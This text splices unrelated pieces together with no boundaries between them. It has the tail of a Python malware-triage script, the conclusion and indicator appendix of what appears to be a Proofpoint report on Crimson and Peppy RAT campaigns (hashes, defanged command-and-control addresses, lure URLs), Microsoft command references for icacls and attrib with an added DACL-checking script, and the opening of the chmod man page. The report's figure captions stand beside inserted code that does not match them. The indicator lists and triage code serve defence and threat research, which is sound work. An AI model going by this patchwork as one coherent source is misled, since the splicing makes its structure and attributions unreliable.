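                    detail = "module ran, nothing harvested"
                else:
                    detail = f"{len(content)} bytes of captured data"
                findings.append(("high", f"{what} at {path}: {detail}"))
    return findings


# Constructed sample collected from a hypothetical host.
SAMPLE_APPDATA = r"C:\Users\alice\AppData\Roaming"
SAMPLE_NOW = datetime(2016, 2, 25, 12, 0, 0)
SAMPLE_REGISTRY = {(LAST_EDATE_KEY, LAST_EDATE_VALUE): "2/1/2016 9:15:00 AM"}
SAMPLE_RUN = {
    "Windows Defender Services": r'"C:\Users\alice\AppData\Roaming\servicesdefender.exe"',
    "OneDrive": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}
SAMPLE_FILES = {
    r"C:\Users\alice\AppData\Roaming\NVIDIA\nvidia": b"[notepad] hello world\r\n",
    r"C:\Users\alice\AppData\Roaming\Roaming\chrome\chrome_update": b"Not Found> > <",
}

if __name__ == "__main__":
    for severity, message in triage(SAMPLE_REGISTRY, SAMPLE_RUN, SAMPLE_FILES, SAMPLE_APPDATA, SAMPLE_NOW):
        print(severity, message)
```

On the sample host the marker is 24 days old, so the routine reports the fetch window as open, flags the servicesdefender.exe Run entry, and reports both logs (the credential log as "nothing harvested" because it holds only the "Not Found> > <" marker).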
Figure 32: Python downloader code

Figure 33: Peppy download_exec routine and MyURLOpener class

Conclusion

As we described, there are clearly a number of common threads throughout these attacks. We have been able to connect campaigns, vectors, payloads, and, in some cases, infrastructure, but additional details continue to emerge. In the short term, this serves as an important reminder that wars are no longer waged solely on the ground or in the air. Rather, threat actors (whether from nation-states or private parties with interests in international conflicts) will use a variety of cyber tools to achieve their goals.

Appendix

Cluster 1 IOCs

Crimson Downloader Samples
032bacaea0d335daec271f228db6bc88
052eb62056794a08a04f4cd61455602c
06c18c72f9f136bacc5c9b0d8fa93195
0a8d414eb910eb4caeb96a648b70eef3
0b651ef0eb7b919e91a2c5c5dbccd27e
0ed7f485166796e10bcb9123de24d211
17dbd878985b78848d4a3a758a3ef89c
1af4df1382c04677050379ccdafcafd2
21fc043b31d22b5c3f5529db83e90422
2c9cc5a8569ab7d06bb8f8d7cf7dc03a
340f31a36e159e58595a375b8b0b37b2
34ad98510d4d6e24b7e38f27a24ad9f6
3a67ebcab5dc3563dc161fdc3c7fb161
3b08095786731c522f5649081f8dbb7e
3cc848432e0ebe25e4f19effdd92d9c2
41a0e4f9745e4bd5ad7b9d500deb76fa
428371be27fc057baac3ea81a8643435
535888163707b60c1a8dfefffad70635
53c10ac66763739b95ac7192a9f489ad
5b6beb9ee6e604f4e474b8129e6135f4
5c6b401979469040b39babb0469fc0c8
5d038817ffeab7715415d68d438af345
5ff65fdefe144800e43a2f6cc6244c75
6c3b38bf90a203b2f7542d0359b8e60e
6d2442494c3019f1597256cbeb45e5f6
6eb40b2e6a67a785d5cc6e4ad9102b5d
7289c160582f010a3c7dbd512c5d8a09
75b390dc72751a062e8106328450ef87
796ae0b75c0e0b08ea84668495df4070
7a6b88e43cccc8133c066b87f72c53f7
803d2758c3b89882e2d41867768d7b15
83a8ce707e625e977d54408ca747fa29
85e2c950ddb18fe1dd18709cfbb9b203
94770186027a0ccdf733b72894a0c7d0
9d4504cdb7b02b9c9fffefcf9b79101d
ac637313520ca159a02d674474d341ef
b67411da3ddfcae9f2a20935619e5c4a
b8098acf09d121ab298351f0c804ef8b
bf1400105c97a28fefd33d8c0df5d4c1
c61061a40dba411b839fe631299c267a
ca27cefe404821ccd8dc695da55102e8
cdc6bb98a2629338d49587d186562fd3
dac4f8ba3190cfa1f813e79864a73fe1
df6b3946d1064f37d1b99f7bfae51203
e3254ad0275370f92cffeacbf603a905
e456d6035e41962a4e49345b00393dcd
edccbc7f880233de987ba4e917877df2
eee91d8de7ea7c0ac3372f65c43e916a

Crimson Downloader Droppers
9e0fef5552100a7e0a2d044b63736fb2
7470757050f584101a851d7ba105db31

Crimson SecApp Samples
07defabf004c891ae836de91260e6c82
0ad849121b4656a239e85379948e5f5d
0ed7f485166796e10bcb9123de24d211
1911c1234cc2918273baeffd7d37392e
2d6d0dbd8ac7c941d78ba14289a7ab9d
43b39b40605afb9d2624f1cede6b48a8
65f6143d69cb1246a117a704e9f07fdc
723d85f905588f092edf8691c1095fdb
765f0556ed4db467291d48e7d3c24b3b
9b3cb979b1397a4a13ea62dbf46510d8
9fcc3e18b9c0bd7380325f24a4623439
b4080cda4fb1b27c727d546c8529909c
ca77af41cbd8c2fd44085d0d61bac64b
df6be8accc487bf63260aacf5e582fe2

Crimson RAT Samples
073889fe855f401c3c4cc548bc08c502
0964887f6f709f9c3f11701412acb9c1
14be26aa207cff81ff814c8a7a8e2f03
19b9f62f29f3689b1db4c56deed7e162
1a1426a94e37e5f3c14cd2b6740e27e1
3ff165ee68d1bc03ae7d4d3baf99b963
4297041e3a701ed8c01e40d6c54264a1
43f47d2045ca98265fd4bd4011a04932
463565ec38e4d790a89eb592435820e3
5371d2984cbd1ae8283f9ae9eeee718d
53a60acc6a09a7fa2eebf4eb88c81af5
59e0fc469d1af7532507c19b47f19960
6746c430f978d0bc9bbecff87c651fa2
71b4bbddf46e1990210742a406c490bf
7e42de66eee8d280a3ba49d5b979c737
811eb99fb1aca98052db4b78c288889c
819715180810caaaa969c816eb2b7491
8317bb3d192c4495507a5945f27705af
8c713cffdc599930a9236c2d0d0ee91a
92f78a182faf26550d6fab2d9ec0692d
943f35200dce22766d0c2906d25be187
94d29dded4dfd920fc4153f18e82fc6c
9fd2838421b28674783b03eb46f4320f
a3aa3a12d81c9862b18f83a77d7215ca
bcbac2241977c976aec01592fb514aa4
c2bc8bc9ff7a34f14403222e58963507
cb0768c89e83f2328952ba51e4d4b7f1
d53de7c980eb34f9369e342d5d235c9b
e7803020e9697d77f165babecf20ea82
eaee83a376914616924eab9b4b96b050
ed1daf18ef09fb2a5c58ab89824ecab0
f078b5aeaf73831361ecd96a069c9f50
fe955b4bbe3b6aa2a1d8ebf6ee7c5c42

Crimson C&C
5.189.143[.]225
5.189.167[.]65
80.241.221[.]109
93.104.213[.]217
193.37.152[.]28
213.136.87[.]122

Peppy RAT Samples
010a50145563a6c554de12b8770f16f7
010aa8d6e6f5346118546b1e4e414cb2
131b4ed3df80e2f794a3e353e2c7f8fb
17d22686bfc825d9369a0751c4cc6a22
1d49dc6af6803d9ffc59a859315b2ac4
22192141d2010fe9fed871d05573dda4
23ec916b3eae3f88853bde8081be870f
2463d1ff1166e845e52a0c580fd3cb7d
2cff1578ac42cc0cd5f59e28d6e7240f
31a9e46ff607b842b8fff4a0644cc0f4
3540f2771b2661ecbd03933c227fb7f7
3b979fd0a8fa0ecbc334a3bbbfb68a36
4a717b657ea475197d967008c7db8353
511bcd411ec79c6ca555670e98709e46
5998641f454f82b738977aa8b3d1d283
725379749d3fa793edcce12291782134
77c7c0117a0e457d7e3ceef4ab82c2ca
7920862303764a55050d2da38b8bf4db
858a729819cc082f2762b6d488284c19
86e27e86e64031720a1ca52d2fbb7c98
af5e96e260b71356d62900551f68f338
b04117ee18182c1c07ffaf6fb35b08bc
c33c79c437d94fad3476f78361df0f24
c9e4c816b4ef23c28992e0e894b9c822
ee5a460ded205d2074a23e387c377840
f13a1a0cbcd5e13dd00dbc77c35973ef
f6d141f45e76cefcb712f69c193b3ac1
f8955450fbd62cb4461c725d8985ff60
fa97cba6a52896e1f2146957a6eec04f
fab5eff5fc65a7a2c5920586df5e29c2

Peppy RAT Domains
applemedia1218.com
avssync3357.com
bbmdroid.com
bbmsync2727.com
bluesync2121.com
eastmedia1221.com
eastmedia3347.co.cc
eastmedia3347.com
facemedia.co.cc
kssync3343.com
kssync3347.co.cc
kssync3347.com
mahee.kssync3343.co.cc
mvssync8767.com
student3347.mooo.com
winupdater2112.com

Andromeda Samples
0123411a6cfe8afb4a45e4afeed767e7
114551a87fa332a243fc05b7246309b9
128c0ccc1252098bc2314d88f4e70044
133e0c441ea744951080d700604a63ee
1f97ddaea7ac0c4e20b2db75969b4545
4b0481a591c87e8542e2089396a10d3c
7ec3ec88185f9c235e2d3da7434b928a
878aa68245675ca5ea677aaf28707b7a
990c3b67061109d82627a5642bf1bb68
a4ce604f8d3ac2e5facdae3c63ef4dc6
a6d75b57bd597e723335f96f074f5700
a6ef041311497bcddb8818b5a4f6c90e
ae2ef98a91c70dc43979ce7df8e475ad
aec91b4453a1b321e302127bc9f21a7c
f0e64d2b011223ece668c595406f1abc
f4123e7f09961479452f0f42b3706293
fb2cb45bf53cef41674da2d9a4bdba32

Andromeda Domains
dvdonlinestore.net
eastmedia2112.com
mustache-styles.com
onlinestoreonsale.com
pradahandbagsshoes.com
vhideip.com
wisheshub.com
99mesotheliomalawyers.com

Various Downloader Samples
2ba1e2a63129517055ab3a63cb089e33
4131776ae573bdb25009a343cf1541f5
44fe2f4dd8b001bbcc4de737128095ca
63ee06dae035981c5aea04f5a52879c1
643e30e665124eea94a22641f79a9c91
67bad4ad3d9a06fc20bea8c3ebb7ad01
7e97efc85be451432388b9f1ce623400
861f621fdf2d3e760df50009fe2824ae
a957e3a7aed4efd1b214d3c3b79f5874
c16b43a5897861fbe023e4b7d340f2e8
dbd5c44e6c189f289e0eea1454897b26
e26150f5186bb7230d85f4cf3aa45d17

Python Downloader Sample
82719f0f6237d3efb9dd67d95f842013

Meterpreter Samples
04e8404f1173037ba4e11241b141d91d
c411ee81c34e14a1ace7e72bea2e8d12
d30c6df94922323041f8036365abbfd2

Meterpreter C&C
5.199.170[.]149

njRAT Sample
27ca136850214234bcdca765dfaed79f

njRAT C&C
5.189.145[.]248

Malicious Documents
0197ff119e1724a1ffbf33df14411001
18711f1db99f6a6f73f8ab64f563accc
1f82e509371c1c29b40b865ba77d091a
278fd26be39a06d5e19c5e7fd7d3dcc2
3966f669a6af4278869b9cce0f2d9279
438031b9d79a17b776b7397e989dd073
68773f362d5ab4897d4ca217a9f53975
76f410c27d97e6c0403df274bebd5f6e
98bdcd97cd536ff6bcb2d39d9a097319

Unknown, likely related
0437655995f4d3104989fb963aa41339
c0ff05a6bf05465adfc9a1dfd5305bde

Unknown C&C
5.189.137[.]8

Luminosity Link Sample
708a1af68d532df35c34f7088b8e798f

Luminosity Link C&C
5.189.145[.]248

Bezigate Samples
236e7451cbce959ca0f62fb3b499b54e
44db769fb1f29a32d5c1998e29b4b7c4
85d182f7a0e049169a7bd0aa796fba96
96dbed32a59b50e6100f1ca35ef5a698
e49edc719eaab11a40158c15c9dd9b7b

Bezigate C&C
107.167.93[.]197
62.4.23[.]46
ad2.admart[.]tv
winupdatess.no-ip[.]biz

DarkComet Samples
0aecd3b79d72cbfa8f5dce2a12e76053
278f889f494d62e214406c4fcfa6f9a3
fd5a419924a0816c6357b47f4e375732

DarkComet C&C
ad2.admart[.]tv
107.167.93[.]197

Intribune.blogspot[.]com Links
hxxp://intribune.blogspot[.]com/2015/11/4-sikh-army-officers-being-trialed-in.html
hxxp://intribune.blogspot[.]com/2015/11/seventh-pay-commission-recommends.html
hxxp://bbmsync2727[.]com/cu/seventh%20pay%20commission%20salary%20calculator.xls
hxxp://intribune.blogspot[.]com/2015/11/army-air-defenceengineers-and-signal-to.html
hxxp://intribune[.]blogspot[.]com/2015/09/sc-seeks-army-response-on-batch-parity.html
hxxp://intribune[.]blogspot[.]com/2015/05/seniors-juniors-and-coursemates-please.html
hxxp://intribune[.]blogspot[.]com/2015/07/awho-defence-and-para-military-forces.html

attachment.biz links
hxxp://ceengrmes[.]attachment[.]biz/?att=1450603943
hxxp://comdtoscc[.]attachment[.]biz/?att=1451926252
hxxp://comdtoscc[.]attachment[.]biz/?att=1453788170
hxxp://fileshare[.]attachment[.]biz/?att=1455255900
hxxp://fileshare[.]attachment[.]biz/?att=1455264091

Cluster 2 IOCs

Crimson SecApp Samples
ccfd8c384558c5a1e09350941faa08ab
167d632eea9bd1b6cac00a69b431a5c0
e3e4ced9b000aa47a449f186c7604ac8
79f7e1d6389c73a7e2525d0ec8fa3ce2
0a7a15180053270e25a220a3e38e7949
17495ce3d11e9cddf5a98ec34ee91d6a
148403235614461c1f088d524fbd9fd0
b67047e341653a01526cc178966d1f6c
ef0ab9f731e7c980b163c7e1b5db9746
3739bbf831d04e8a2b06275cd3af371d
0d7846a76675be378a50667767d0e35a
4f9b754da90bed9a633130d893d65c4e
3e91836b89b6d6249741dc8ee0d2895a
85429d5f2745d813e53b28d3d953d1cd

Crimson RAT Samples
870c0312cea7b3b6b82be01633b071cd
a74165ec1d55b682ed232ffde62b3b11
8336d9aeccee3408a4f9fbf4b1a42bac
2dfe4468a052a07cab117a20e182adc9

Crimson C&C
178.238.228[.]113

Beendoor Downloader
950eb314435bdb3c46c9f0954c935287

Beendoor Sample
d3094c89cad5f8d1ea5f0a7f23f0a2b1

Beendoor C&C
178.238.235[.]143

Cluster 3 IOCs

Crimson RAT Samples
51c57b0366d0b71acf05b4df0afef52f
438f3ea41587e9891484dad233d6faa6
71cd70b289c53567579f8f6033d8191b
d8637bdbcfc9112fcb1f0167b398e771
12929730cd95c6cf50dd3d470dd5f347
7ccc752b5956b86b966d15a6a4cf6df0
b2ed9415d7cf9bc06f8ccb8cfdba1ad6
cedb0fc3dfbb748fdcbb3eae9eb0a3f1
95cba4805f980e8c1df180b660e2abb4

Crimson C&C
88.150.227.71

Cluster 4 IOCs

Crimson Downloader Sample
5d9b42853ecf3ff28d4e4313276b21ed

Crimson RAT Samples
90b07bc12b45f2eb1b0305949f2cec25
3e7c2791ff7bc14ef30bba74954ef1e2
44145124e046804bf579c8839b63a9a7
a73494ca564f6404488a985cefd96f56
8a0db32b97be106d2834739ffd65715b
ddb66b231ab63c65a8ce139e73652aec

Crimson C&C
bhai123.no-ip[.]biz
bhai1.ddns[.]net
sudhir71nda.no-ip[.]org
119.154.134[.]211
119.154.209[.]175
119.154.220[.]96
119.157.163[.]145
119.157.229[.]245
182.181.239[.]4

Unclustered Crimson Samples

Crimson Downloader Samples
6a1c037c66184aa39096933f75d2d8ca
99d93e0c6bf9cf9acb92580686f6b743
af071cd2420057090cfe33fefa139d01
8c30ed1bc13feaa8e937be0f6a739be4
adf657337d7fa7fa07c72b12fb880e41
e2d1309893c0de5a026a2ae9e8ada486
99d93e0c6bf9cf9acb92580686f6b743
d0152f228e934dcafa866445c08e3242
af071cd2420057090cfe33fefa139d01
9b674985a412c4c07d52c7482c2ed286
c3af6b938988a88ea2dc2e59f8418062
2d58826fbff197918caa805aeed86059
ab6b6f675e48d818044c5e66d05813ce
4b1a627c43d4e0af504bf20023e74f6b
75798547f0ddca076070bcea67a0b064
0255f73a32bf781c786d19d149ddfb90
16eb146eee147a333ef82d39266d5cfb
2507f545a2d6e52ade2d7708d9ce89d1
f9798f171194ee4fec5334ded3d786e7
9b77eb38e32d43a97c5bde5ec829c5ca
2eea994efa88e0a612e82ee3e08e78f1

Crimson SecApp Samples
c303a6ac44e3c59a9c3613ac9f92373b
92d6366d692a1b3691dce1379bb7b5aa
eb01bbfe8ca7e8f59aab475ad1f18245
4d7ad9ab4c1d40365da60d4f2f195db4
f936afdd0b69d109215d295ab864d309
ec4bef2233002d8fe568428d16e610b1
045c4b69d907833729fd83d937669f66
522178a60b030bbab910cb86cfeaff20
1ab5f55763663ffb0807079397812b47
73b878e56f790dccf08bd2344b4031c8
f0f6544ddb26c55df2d6184f433d8c17
7c23f984170fd793cfde5fd68535d0a8
73b878e56f790dccf08bd2344b4031c8
7e50c67f1e94b154f110d5d73e2f312c
1bedd50f4ae757c6009acbe7da021122
ae9659a2c08e2cb9ab9e5cdcb8ab4036
0991033c2414b4992c1b5ab21c5a47e2
f710e3ad19a682dab374c167c7c2796a

Crimson RAT Samples
214eb28f04d969c9f637b09e4ffad644
29097319b60c103421437214d5a3297e
38ce32cb94092cc6790030abcc9a638b
439ba84a964a17ce2c3d51ac49c68f81
4e9b81e70227575f2d2a6dd941540afa
5b4361e6a6117e9f7189a564f46157d7
5dbeb8475e22a938415eb43e6bd24fe8
6409930f39cd6c17fb68f7fee47b1cdf
82377fcf288e9db675ab24cbf76ea032
84c30675b5db34c407b98ea73c5e7e96
897fc3a65f84e1c3db932965a574d982
9e73d275202b02b3f0ed23951fda30da
b0327f155ebaba23102f72c1100fa26b
b05730eda99a9160cc3f8dec66e9f347
b467df662af8a1fbafa845c894d917e3
c0bf5a0f535380edec9b42a3cebb84c4
ca48224adce9609dc07e50930dd1afae
dac44b9d5a8494a3293088c9678754bc
e0217714f3a03fae4cdf4b5120213c38
e66203177a03743a6361a7b3e668b6a6
f05834a930f6fda6b877011c3fb3ef18
f1a2caf0dd7922ea3a64231fd5af7715

Crimson C&C
5.189.131[.]67
5.189.152[.]147
5.189.167[.]220
5.189.167[.]23
79.143.181[.]21
79.143.188[.]166
193.164.131[.]58
213.136.69[.]224
213.136.73[.]122
213.136.84[.]43

MSIL/Crimson Modules

Keylogger
f18172d7bb8b98246cb3dbb0e9144731
b55a7da332bed90e798313b968ce7819
c0eb694960d0a7316264ced4d44b3abb
292f468f98e322795d1185c2b15c1f62
b6263f987fdec3fb3877845c8d5479dd
127ee83854f47628984ab47de725ee2f
2fa82dd2490fc697bb0bb0f8feb0dd85
bc6d139a3d630ba829337687b9328caf
f3c8630d06e51e8f76aa1fb438371d21
3a64e2d3558a28c4fdb0f076fa09e1a1
370bb0ec1c16bd8821f7e53f6bfc61e3

Infostealer
d938a75d93c20790b1f2b5d5b7294895
29eb61f04b905e2133e9afdd12482073
9bdfc0d5c45f1ce1200419ec6eec15f4
8a991eec65bd90f12450ee9dac0f286a

USBstealer
c3d65d73cd6894fdad3fc281b976fd8b
e9b1a3aa2de67300356b6587a8034b0b
cf5e472613921dc330008c79870b23ab
bf2eb6c19778a35f812ddc86d616c837
1e5c2029dafdd50dce2effd5154b6879
b785db2b3801d5190dad9e6f03d48999
3f84ddc0d9ec7b08477a76b75b4421b8
c0ceba3a708082c372c077aa9420d09e
d11ebec8f1d42dd139b18639f7f9534a -> 5.189.167[.]220

URLDownloader Module Sample
532013750ee3caac93a9972103761233

URLDownloader C&C
hxxp://sahirlodhi[.]com/usr/api.txt

About Proofpoint

Proofpoint Inc. (NASDAQ:PFPT) is a leading security-as-a-service provider that focuses on cloud-based solutions for threat protection, compliance, archiving & governance, and secure communications. Organizations around the world depend on Proofpoint’s expertise, patented technologies and on-demand delivery system to protect against phishing, malware and spam, safeguard privacy, encrypt sensitive information, and archive and govern messages and critical enterprise information.

892 Ross Drive, Sunnyvale, CA 94089 | 1.408.517.4710 | www.proofpoint.com

© Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners.
icacls | Microsoft Docs

icacls
08/21/2018

Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories. For examples of how to use this command, see Examples.

Syntax

icacls <FileName> [/grant[:r] <Sid>:<Perm>[...]] [/deny <Sid>:<Perm>[...]] [/remove[:g|:d]] <Sid>[...]] [/t] [/c] [/l] [/q] [/setintegritylevel <Level>:<Policy>[...]]
icacls <Directory> [/substitute <SidOld> <SidNew> [...]] [/restore <ACLfile> [/c] [/l] [/q]]

Parameters

<FileName>
    Specifies the file for which to display DACLs.
<Directory>
    Specifies the directory for which to display DACLs.
/t
    Performs the operation on all specified files in the current directory and its subdirectories.
/c
    Continues the operation despite any file errors. Error messages will still be displayed.
/l
    Performs the operation on a symbolic link versus its destination.
/q
    Suppresses success messages.
[/save <ACLfile> [/t] [/c] [/l] [/q]]
    Stores DACLs for all matching files into ACLfile for later use with /restore.
[/setowner <Username> [/t] [/c] [/l] [/q]]
    Changes the owner of all matching files to the specified user.
[/findSID <Sid> [/t] [/c] [/l] [/q]]
    Finds all matching files that contain a DACL explicitly mentioning the specified security identifier (SID).
[/verify [/t] [/c] [/l] [/q]]
    Finds all files with ACLs that are not canonical or have lengths inconsistent with ACE (access control entry) counts.
[/reset [/t] [/c] [/l] [/q]]
    Replaces ACLs with default inherited ACLs for all matching files.
[/grant[:r] <Sid>:<Perm>[...]]
    Grants specified user access rights. With :r, the permissions replace previously granted explicit permissions. Without :r, permissions are added to any previously granted explicit permissions.
[/deny <Sid>:<Perm>[...]]
    Explicitly denies specified user access rights. An explicit deny ACE is added for the stated permissions and the same permissions in any explicit grant are removed.
[/remove[:g|:d]] <Sid>[...]] [/t] [/c] [/l] [/q]
    Removes all occurrences of the specified SID from the DACL. :g removes all occurrences of granted rights to the specified SID. :d removes all occurrences of denied rights to the specified SID.
[/setintegritylevel [(CI)(OI)]<Level>:<Policy>[...]]
    Explicitly adds an integrity ACE to all matching files. Level is specified as L[ow], M[edium] or H[igh]. Inheritance options for the integrity ACE may precede the level and are applied only to directories.
[/substitute <SidOld> <SidNew> [...]]
    Replaces an existing SID (SidOld) with a new SID (SidNew). Requires the Directory parameter.
/restore <ACLfile> [/c] [/l] [/q]
    Applies stored DACLs from ACLfile to files in the specified directory. Requires the Directory parameter.
/inheritancelevel:[e|d|r]
    Sets the inheritance level: e enables inheritance; d disables inheritance and copies the ACEs; r removes all inherited ACEs.

Remarks

SIDs may be in either numerical or friendly name form. If you use a numerical form, affix the wildcard character * to the beginning of the SID.

icacls preserves the canonical order of ACE entries as:
1. Explicit denials
2. Explicit grants
3. Inherited denials
4. Inherited grants

Perm is a permission mask that can be specified in one of the following forms:

A sequence of simple rights:
    F (full access)
    M (modify access)
    RX (read and execute access)
    R (read-only access)
    W (write-only access)

A comma-separated list in parentheses of specific rights:
    D (delete)
    RC (read control)
    WDAC (write DAC)
    WO (write owner)
    S (synchronize)
    AS (access system security)
    MA (maximum allowed)
    GR (generic read)
    GW (generic write)
    GE (generic execute)
    GA (generic all)
    RD (read data/list directory)
    WD (write data/add file)
    AD (append data/add subdirectory)
    REA (read extended attributes)
    WEA (write extended attributes)
    X (execute/traverse)
    DC (delete child)
    RA (read attributes)
    WA (write attributes)

Inheritance rights may precede either Perm form, and they are applied only to directories:
    (OI): object inherit
    (CI): container inherit
    (IO): inherit only
    (NP): do not propagate inherit

Examples

To save the DACLs for all files in the C:\Windows directory and its subdirectories to the ACLFile file, type:

    icacls c:\windows\* /save aclfile /t

To restore the DACLs for every file within ACLFile that exists in the C:\Windows directory and its subdirectories, type:

    icacls c:\windows\ /restore aclfile

To grant the user User1 Delete and Write DAC permissions to a file named "Test1", type:

    icacls test1 /grant User1:(d,wdac)

To grant the user defined by SID S-1-1-0 Delete and Write DAC permissions to a file named "Test2", type:

    icacls test2 /grant *S-1-1-0:(d,wdac)

Additional references: Command-Line Syntax Key
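The permission-mask grammar, the inheritance flags and the canonical ACE order documented above are enough to write a small checker, which is what a reviewer auditing a directory's DACL actually needs. The following is an added example written for this page in Python, not code from Microsoft or from the icacls tool: it parses entries in the `<Sid>:[(OI)(CI)...]<Perm>` form used on the command line, accepts the closely related shape that `icacls <FileName>` prints (simple rights wrapped in parentheses, `(I)` for inherited and `(DENY)` for deny entries, which is an assumption about the output format), checks the canonical order the way `/verify` does, and flags grants that let any user write to the object. The sample entries are constructed.

```python
"""Parse icacls-style ACE entries, check canonical ACE order and flag broad write grants.

Added example (not from the Microsoft page). Entry grammar follows the page:
    <Sid>:[(OI)(CI)(IO)(NP)]<Perm>    with <Perm> = F|M|RX|R|W or (D,WDAC,...)
Entries printed by `icacls <FileName>` use the same shape but wrap simple rights
in parentheses and prefix (I) for inherited and (DENY) for deny ACEs (assumed format).
"""
import re
from dataclasses import dataclass

SIMPLE_RIGHTS = {"F", "M", "RX", "R", "W"}
SPECIFIC_RIGHTS = {"D", "RC", "WDAC", "WO", "S", "AS", "MA", "GR", "GW", "GE", "GA",
                   "RD", "WD", "AD", "REA", "WEA", "X", "DC", "RA", "WA"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP"}
# Rights that let a principal alter content, attributes, owner or the DACL itself.
WRITE_LIKE = {"F", "M", "W", "GA", "GW", "WD", "AD", "WDAC", "WO", "D", "DC", "WEA", "WA"}
# Principals that mean "anyone"; *S-1-1-0 is the numeric form of Everyone.
BROAD_PRINCIPALS = {"EVERYONE", "*S-1-1-0", "BUILTIN\\USERS", "NT AUTHORITY\\AUTHENTICATED USERS"}

_GROUP = re.compile(r"\(([^()]*)\)")


@dataclass(frozen=True)
class Ace:
    sid: str
    kind: str              # "grant" or "deny"
    inherited: bool        # True when the entry carried (I)
    inheritance: tuple     # e.g. ("OI", "CI"); meaningful for directories only
    rights: frozenset


def parse_ace(entry, kind="grant"):
    """Parse one entry such as 'User1:(d,wdac)' or 'BUILTIN\\Users:(I)(OI)(CI)(RX)'."""
    sid, colon, rest = entry.strip().partition(":")
    if not colon or not sid:
        raise ValueError(f"missing ':' between SID and permissions in {entry!r}")
    inherited, flags, rights = False, [], set()
    for group in _GROUP.findall(rest):
        token = group.strip().upper()
        if token == "DENY":
            kind = "deny"
        elif token == "I":
            inherited = True
        elif token in INHERIT_FLAGS:
            flags.append(token)
        elif token in SIMPLE_RIGHTS:          # output form: (F), (RX) ...
            rights.add(token)
        else:                                 # specific-rights list: (D,WDAC)
            parts = {p.strip().upper() for p in token.split(",")}
            unknown = parts - SPECIFIC_RIGHTS - SIMPLE_RIGHTS
            if unknown:
                raise ValueError(f"unknown right(s) {sorted(unknown)} in {entry!r}")
            rights |= parts
    bare = _GROUP.sub("", rest).strip().upper()   # command-line form: (OI)(CI)F -> F
    if bare:
        if bare not in SIMPLE_RIGHTS:
            raise ValueError(f"unknown simple right {bare!r} in {entry!r}")
        rights.add(bare)
    if not rights:
        raise ValueError(f"no permission mask in {entry!r}")
    return Ace(sid, kind, inherited, tuple(flags), frozenset(rights))


def is_valid_ace(entry):
    try:
        parse_ace(entry)
        return True
    except ValueError:
        return False


def canonical_rank(ace):
    # Order the page gives: explicit denies, explicit grants, inherited denies, inherited grants.
    return (ace.inherited, ace.kind == "grant")


def is_canonical(aces):
    """What `icacls /verify` checks: the ACEs must already be in canonical order."""
    ranks = [canonical_rank(a) for a in aces]
    return ranks == sorted(ranks)


def canonicalize(aces):
    return sorted(aces, key=canonical_rank)   # stable: keeps order within each class


def broad_write_grants(aces):
    """Grants that let any user modify the object, the usual finding on a tool or service directory."""
    return [a for a in aces
            if a.kind == "grant" and a.sid.upper() in BROAD_PRINCIPALS and a.rights & WRITE_LIKE]


# Constructed sample: entries as icacls might print them for a tools directory, already split.
SAMPLE_ENTRIES = [
    "NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)",
    "BUILTIN\\Administrators:(I)(OI)(CI)(F)",
    "BUILTIN\\Users:(OI)(CI)(M)",
    "Everyone:(DENY)(D)",
]

if __name__ == "__main__":
    aces = [parse_ace(e) for e in SAMPLE_ENTRIES]
    print("canonical:", is_canonical(aces))
    for ace in canonicalize(aces):
        print(ace)
    print("broad write grants:", [a.sid for a in broad_write_grants(aces)])
```

On the sample, the explicit Users grant and the explicit Everyone deny sit after inherited entries, so is_canonical is False and canonicalize moves the deny first; broad_write_grants reports the BUILTIN\Users modify grant, which is the entry an operator would tighten with /remove or /grant:r.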
attrib (Microsoft Docs)
10/16/2017, 2 minutes to read

Displays, sets, or removes attributes assigned to files or directories. If used without parameters, attrib displays attributes of all files in the current directory. For examples of how to use this command, see Examples.

Syntax
  attrib [{+|-}r] [{+|-}a] [{+|-}s] [{+|-}h] [{+|-}i] [:][][] [/s [/d] [/l]]

Parameters
  {+|-}r   Sets (+) or clears (-) the Read-only file attribute.
  {+|-}a   Sets (+) or clears (-) the Archive file attribute.
  {+|-}s   Sets (+) or clears (-) the System file attribute.
  {+|-}h   Sets (+) or clears (-) the Hidden file attribute.
  {+|-}i   Sets (+) or clears (-) the Not Content Indexed file attribute.
  [:][][]  Specifies the location and name of the directory, file, or group of files for which you want to display or change attributes. You can use the ? and * wildcard characters in the FileName parameter to display or change the attributes for a group of files.
  /s       Applies attrib and any command-line options to matching files in the current directory and all of its subdirectories.
  /d       Applies attrib and any command-line options to directories.
  /l       Applies attrib and any command-line options to the Symbolic Link, rather than the target of the Symbolic Link.
  /?       Displays help at the command prompt.

Remarks
You can use wildcard characters (? and *) with the FileName parameter to display or change the attributes for a group of files. If a file has the System (s) or Hidden (h) attribute set, you must clear the attribute before you can change any other attributes for that file. The Archive attribute (a) marks files that have changed since the last time they were backed up. Note that the xcopy command uses archive attributes.
Examples

To display the attributes of a file named News86 that is located in the current directory, type:
  attrib news86

To assign the Read-only attribute to the file named Report.txt, type:
  attrib +r report.txt

To remove the Read-only attribute from files in the Public directory and its subdirectories on a disk in drive B, type:
  attrib -r b:\public\*.* /s

To set the Archive attribute for all files on drive A, and then clear the Archive attribute for files with the .bak extension, type:
  attrib +a a:*.* & attrib -a a:*.bak
chmod(1) - Linux man page (die.net)

Name
  chmod - change file mode bits

Synopsis
  chmod [OPTION]... MODE[,MODE]... FILE...
  chmod [OPTION]... OCTAL-MODE FILE...
  chmod [OPTION]... --reference=RFILE FILE...

Description
This manual page documents the GNU version of chmod. chmod changes the file mode bits of each given file according to mode, which can be either a symbolic representation of changes to make, or an octal number representing the bit pattern for the new mode bits.

The format of a symbolic mode is [ugoa...][[+-=][perms...]...], where perms is either zero or more letters from the set rwxXst, or a single letter from the set ugo. Multiple symbolic modes can be given, separated by commas.

A combination of the letters ugoa controls which users' access to the file will be changed: the user who owns it (u), other users in the file's group (g), other users not in the file's group (o), or all users (a). If none of these are given, the effect is as if a were given, but bits that are set in the umask are not affected.

The operator + causes the selected file mode bits to be added to the existing file mode bits of each file; - causes them to be removed; and = causes them to be added and causes unmentioned bits to be removed except that a directory's unmentioned set user and group ID bits are not affected.

